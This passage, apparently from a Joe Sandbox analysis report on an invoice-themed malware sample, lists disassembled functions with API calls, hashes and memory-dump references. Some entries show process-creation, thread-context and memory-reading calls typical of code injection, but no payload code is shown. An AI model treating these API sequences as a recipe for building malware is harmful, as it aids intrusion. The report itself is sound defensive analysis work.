                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                              • String ID:
                                                              • API String ID: 3902256705-0
                                                              • Opcode ID: a767735a089ce1f222fbb07c75c6eaa0115f50ff39e1509396e5ede2f0316ca8
                                                              • Instruction ID: 4f9e9a2cfeaa3b225fc2e75bce4c884039818501c1679ba409cb4c9f7d24d06f
                                                              • Opcode Fuzzy Hash: a767735a089ce1f222fbb07c75c6eaa0115f50ff39e1509396e5ede2f0316ca8
                                                              • Instruction Fuzzy Hash: 4FF0F43116021E67CB10BFA8DD169DE7BECAF10314F608135FA08A24C2CBB096B48AA5
                                                              Function 002135E4 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00217C0E: __getptd_noexit.LIBCMT ref: 00217C0E
                                                              • __lock_file.LIBCMT ref: 00213629
                                                                • Part of subcall function 00214E1C: __lock.LIBCMT ref: 00214E3F
                                                              • __fclose_nolock.LIBCMT ref: 00213634
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                              • String ID:
                                                              • API String ID: 2800547568-0
                                                              • Opcode ID: 743adc9a600983ea47552ba26201384d6aef3c03e4341f2dac14f237c949ee8c
                                                              • Instruction ID: d160319c8e8b4318400887373f6442533b5be1a8aadb86339f4538e7ef1716f0
                                                              • Opcode Fuzzy Hash: 743adc9a600983ea47552ba26201384d6aef3c03e4341f2dac14f237c949ee8c
                                                              • Instruction Fuzzy Hash: 95F0F631820204AAD711BF6488067DE7AE66F61734F258108E420BB2C1CB7886A19E59
                                                              Function 00E25DE5 Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateProcessW.KERNELBASE(?,00000000), ref: 00E265A3
                                                              • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00E26639
                                                              • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00E2665B
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2166684470.0000000000E24000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E24000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_e24000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                              • String ID:
                                                              • API String ID: 2438371351-0
                                                              • Opcode ID: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
                                                              • Instruction ID: 9e65fe44a2bb227765470190b7fd2a33122a780d6f7cfe6eef92e22e158aa249
                                                              • Opcode Fuzzy Hash: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
                                                              • Instruction Fuzzy Hash: DC12DF24E18658C6EB24DF64D8507DEB232EF68300F1061E9910DEB7A5E77A4F81CF5A
                                                              Function 00212957 Relevance: 1.6, APIs: 1, Instructions: 135COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __flush.LIBCMT ref: 00212A0B
                                                                • Part of subcall function 00217C0E: __getptd_noexit.LIBCMT ref: 00217C0E
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: __flush__getptd_noexit
                                                              • String ID:
                                                              • API String ID: 4101623367-0
                                                              • Opcode ID: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
                                                              • Instruction ID: af98a3c31ee81b7e897a272503ad256954d7e88975545c640b745a1fa47b43ee
                                                              • Opcode Fuzzy Hash: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
                                                              • Instruction Fuzzy Hash: C8416071620707DFDF288E69C8815EE7BE6AF64360B24853DF855C7240EA709DF98B84
                                                              Function 0020ED18 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: ProtectVirtual
                                                              • String ID:
                                                              • API String ID: 544645111-0
                                                              • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                              • Instruction ID: 4141e755f8415d4e138a3c0eebfa2f60d0947f9b9bdbe13643fe977bdbb8bc79
                                                              • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                              • Instruction Fuzzy Hash: DA31FA71A10206DBCB18DF18C490969FBBAFF49340B658AA5E409CF396DB30EDD1CB80
                                                              Function 0025040F Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: _free
                                                              • String ID:
                                                              • API String ID: 269201875-0
                                                              • Opcode ID: d64e5fb77bbdb09b926f15cd2b66f81244cdcde152a6a83921c6031d14e52a83
                                                              • Instruction ID: 3663187b49faf536556a92159e2c36264ded3dfb720da9056f0c20f445bf577b
                                                              • Opcode Fuzzy Hash: d64e5fb77bbdb09b926f15cd2b66f81244cdcde152a6a83921c6031d14e52a83
                                                              • Instruction Fuzzy Hash: ED31C275124628CFCF01AF10D4D566E7BB0FF48721F10844AEE951B386E7B0A929CF85
                                                              Function 00269A75 Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: ClearVariant
                                                              • String ID:
                                                              • API String ID: 1473721057-0
                                                              • Opcode ID: c0ac21f265b6588f610e06d94c98f98840e9e44707a17b9a4e7f635c3f7e7555
                                                              • Instruction ID: 35ca3acb81670a6cbdf01461d6e5157b6ce5ea27a1019e1991d12af1a886b280
                                                              • Opcode Fuzzy Hash: c0ac21f265b6588f610e06d94c98f98840e9e44707a17b9a4e7f635c3f7e7555
                                                              • Instruction Fuzzy Hash: A2415D705147018FEB24DF14C484B1ABBE0BF45308F1989ACE99A5B3A2C772F895CF52
                                                              Function 001F41A9 Relevance: 1.6, APIs: 1, Instructions: 63libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 001F4214: FreeLibrary.KERNEL32(00000000,?), ref: 001F4247
                                                              • LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,001F39FE,?,00000001), ref: 001F41DB
                                                                • Part of subcall function 001F4291: FreeLibrary.KERNEL32(00000000), ref: 001F42C4
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Library$Free$Load
                                                              • String ID:
                                                              • API String ID: 2391024519-0
                                                              • Opcode ID: d51ed22c189059d7e4b438717b535d1fcf2e928ffab6992e787d353be37f14e2
                                                              • Instruction ID: b34e73867847ff58f737be1d235faf075f9fa8c5fbb389f3085e96a7273a0e5a
                                                              • Opcode Fuzzy Hash: d51ed22c189059d7e4b438717b535d1fcf2e928ffab6992e787d353be37f14e2
                                                              • Instruction Fuzzy Hash: 8011A33161020AABDF14FF74EC06FBF77E9AF90700F108439B696A61C1DB749A519BA0
                                                              Function 00269B45 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: ClearVariant
                                                              • String ID:
                                                              • API String ID: 1473721057-0
                                                              • Opcode ID: d7dc65bfc8cc211f07abb7c3c5341a228c37085d9ae1a997d88693447e9812dd
                                                              • Instruction ID: 4c466189c1d91b6587ca8181f6a35047ab3ca0efd082984772890a046175c2f0
                                                              • Opcode Fuzzy Hash: d7dc65bfc8cc211f07abb7c3c5341a228c37085d9ae1a997d88693447e9812dd
                                                              • Instruction Fuzzy Hash: CA2126705287018FEB24DF24C484B1ABBE1BF84304F154968E69A4B6A2C771F865CF52
                                                              Function 0021AF61 Relevance: 1.6, APIs: 1, Instructions: 56COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • ___lock_fhandle.LIBCMT ref: 0021AFC0
                                                                • Part of subcall function 00217BDA: __getptd_noexit.LIBCMT ref: 00217BDA
                                                                • Part of subcall function 00217C0E: __getptd_noexit.LIBCMT ref: 00217C0E
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: __getptd_noexit$___lock_fhandle
                                                              • String ID:
                                                              • API String ID: 1144279405-0
                                                              • Opcode ID: f41ab09db3fdbcd21c8e331523864e98c90fc260d6cbe328d0f7129d370edaa5
                                                              • Instruction ID: 20efa336c4a5815ab13f945496cb4794274d49f432f9cb8057e1f5512b376f4b
                                                              • Opcode Fuzzy Hash: f41ab09db3fdbcd21c8e331523864e98c90fc260d6cbe328d0f7129d370edaa5
                                                              • Instruction Fuzzy Hash: 991163728396009FD7126FA4D8457EE36F19FA5335F294340E4345B1E2C7B589E08FA1
                                                              Function 001F39DB Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: LibraryLoad
                                                              • String ID:
                                                              • API String ID: 1029625771-0
                                                              • Opcode ID: e908df7db2011151d19b897d4a4948494f90a1a3426dd436a38c65c5f4b6a17e
                                                              • Instruction ID: 9aa309ff3efaad7466095c4472260523363430563f7eaad8db9a02755b978407
                                                              • Opcode Fuzzy Hash: e908df7db2011151d19b897d4a4948494f90a1a3426dd436a38c65c5f4b6a17e
                                                              • Instruction Fuzzy Hash: 8E01367151010EEFCF05EF64C8918FFBB74AF20344F108065B66697195EB309A99DF60
                                                              Function 00212AAE Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __lock_file.LIBCMT ref: 00212AED
                                                                • Part of subcall function 00217C0E: __getptd_noexit.LIBCMT ref: 00217C0E
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: __getptd_noexit__lock_file
                                                              • String ID:
                                                              • API String ID: 2597487223-0
                                                              • Opcode ID: b9e1a44e1e9212d74940298f68c15831f4336a7e71fcd11ab746f4a0af884a1d
                                                              • Instruction ID: 8da29b67c808b32c0b2e52551e44f1070710121534f0e5a8ef75fd26630c3ef5
                                                              • Opcode Fuzzy Hash: b9e1a44e1e9212d74940298f68c15831f4336a7e71fcd11ab746f4a0af884a1d
                                                              • Instruction Fuzzy Hash: 81F0C231520205EBDF25AF748C067DF3AE5BF20314F244415B4149A191C7788AF6DF51
                                                              Function 001F4252 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FreeLibrary.KERNEL32(?,?,?,?,?,001F39FE,?,00000001), ref: 001F4286
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: FreeLibrary
                                                              • String ID:
                                                              • API String ID: 3664257935-0
                                                              • Opcode ID: ba6ba945af476a3d03ee1c27939a6301cdad0da501bad5f92c4d9a04cacce3dc
                                                              • Instruction ID: 02fe61c6a97c27ad4018f16ea0c82540acb9181bc185fe572e5ec10f62f7047d
                                                              • Opcode Fuzzy Hash: ba6ba945af476a3d03ee1c27939a6301cdad0da501bad5f92c4d9a04cacce3dc
                                                              • Instruction Fuzzy Hash: 8FF015B1505706DFCB38DF64E894827BBE5BF143253258A3EF2DA82610C7329880DF50
                                                              Function 001F40A7 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 001F40C6
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: LongNamePath
                                                              • String ID:
                                                              • API String ID: 82841172-0
                                                              • Opcode ID: 12c5f28853d0bc651b961d332ba73faab6f2967958e8570dc1dffdcdca62115e
                                                              • Instruction ID: a9d30f48c917f95b6b2a11d7e859eefda67f7ef631a29fb083a588394111e56b
                                                              • Opcode Fuzzy Hash: 12c5f28853d0bc651b961d332ba73faab6f2967958e8570dc1dffdcdca62115e
                                                              • Instruction Fuzzy Hash: 58E0C2766002285BC711A658DC46FFA77ADDFC86A0F0A00B5FA0DE7244DA74ADC18A90
                                                              Function 00E26DE8 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • Sleep.KERNELBASE(000001F4), ref: 00E26DF9
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2166684470.0000000000E24000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E24000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_e24000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Sleep
                                                              • String ID:
                                                              • API String ID: 3472027048-0
                                                              • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                              • Instruction ID: bebc2f1724eba3a13f96a525f4a2b3e11d09e3e9f8de45f2569647564fd2728c
                                                              • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                              • Instruction Fuzzy Hash: 4CE0E67494010DDFDB00DFB4D54969E7BB4EF04301F1002A5FD01E2280D6309E609A72

                                                              Non-executed Functions

                                                              Function 0025F7FF Relevance: 74.1, APIs: 40, Strings: 2, Instructions: 630windowkeyboardCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0020B34E: GetWindowLongW.USER32(?,000000EB), ref: 0020B35F
                                                              • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?,?), ref: 0025F87D
                                                              • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0025F8DC
                                                              • GetWindowLongW.USER32(?,000000F0), ref: 0025F919
                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0025F940
                                                              • SendMessageW.USER32 ref: 0025F966
                                                              • _wcsncpy.LIBCMT ref: 0025F9D2
                                                              • GetKeyState.USER32(00000011), ref: 0025F9F3
                                                              • GetKeyState.USER32(00000009), ref: 0025FA00
                                                              • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0025FA16
                                                              • GetKeyState.USER32(00000010), ref: 0025FA20
                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0025FA4F
                                                              • SendMessageW.USER32 ref: 0025FA72
                                                              • SendMessageW.USER32(?,00001030,?,0025E059), ref: 0025FB6F
                                                              • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?,?), ref: 0025FB85
                                                              • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0025FB96
                                                              • SetCapture.USER32(?), ref: 0025FB9F
                                                              • ClientToScreen.USER32(?,?), ref: 0025FC03
                                                              • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0025FC0F
                                                              • InvalidateRect.USER32(?,00000000,00000001,?,?,?,?), ref: 0025FC29
                                                              • ReleaseCapture.USER32 ref: 0025FC34
                                                              • GetCursorPos.USER32(?), ref: 0025FC69
                                                              • ScreenToClient.USER32(?,?), ref: 0025FC76
                                                              • SendMessageW.USER32(?,00001012,00000000,?), ref: 0025FCD8
                                                              • SendMessageW.USER32 ref: 0025FD02
                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 0025FD41
                                                              • SendMessageW.USER32 ref: 0025FD6C
                                                              • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0025FD84
                                                              • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0025FD8F
                                                              • GetCursorPos.USER32(?), ref: 0025FDB0
                                                              • ScreenToClient.USER32(?,?), ref: 0025FDBD
                                                              • GetParent.USER32(?), ref: 0025FDD9
                                                              • SendMessageW.USER32(?,00001012,00000000,?), ref: 0025FE3F
                                                              • SendMessageW.USER32 ref: 0025FE6F
                                                              • ClientToScreen.USER32(?,?), ref: 0025FEC5
                                                              • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0025FEF1
                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 0025FF19
                                                              • SendMessageW.USER32 ref: 0025FF3C
                                                              • ClientToScreen.USER32(?,?), ref: 0025FF86
                                                              • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0025FFB6
                                                              • GetWindowLongW.USER32(?,000000F0), ref: 0026004B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$ClientScreen$Image$CursorDragList_LongStateWindow$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                              • String ID: @GUI_DRAGID$F
                                                              • API String ID: 2516578528-4164748364
                                                              • Opcode ID: 8685a7b925c19488d06d3d2125a4381e1134d49f06128bd6a2feeff90fe22b75
                                                              • Instruction ID: b5c635c2f0099dd75c57d78913462175f2c67481237c3730c4ee8182508959ce
                                                              • Opcode Fuzzy Hash: 8685a7b925c19488d06d3d2125a4381e1134d49f06128bd6a2feeff90fe22b75
                                                              • Instruction Fuzzy Hash: AE32F070614346EFDB10CF24C988BAABBB8FF48354F140629FA99872A1D771DC68CB55
                                                              Function 0025AACE Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 574windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 0025B1CD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: MessageSend
                                                              • String ID: %d/%02d/%02d
                                                              • API String ID: 3850602802-328681919
                                                              • Opcode ID: a355d69f399beab0d77fd6d6bdcce43e19a7717326644e259db8f602447636d8
                                                              • Instruction ID: 4c8d1334cf6493a5f5bcf7675ae5fd126c9c8318f25599101356eae0a1364236
                                                              • Opcode Fuzzy Hash: a355d69f399beab0d77fd6d6bdcce43e19a7717326644e259db8f602447636d8
                                                              • Instruction Fuzzy Hash: 8112FE7052020AAFEB259F24DC4AFAE7BB8FF44311F108219FD19AB2D1DBB08955CB55
                                                              Function 0020EB42 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON
                                                              Download Yara Rule
                                                              APIs
